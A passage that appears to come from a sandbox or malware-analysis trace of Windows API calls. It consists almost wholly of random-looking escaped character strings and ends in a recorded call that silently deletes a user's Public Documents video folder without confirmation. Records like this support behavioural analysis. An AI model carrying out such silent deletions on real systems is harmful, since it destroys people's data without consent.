b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b7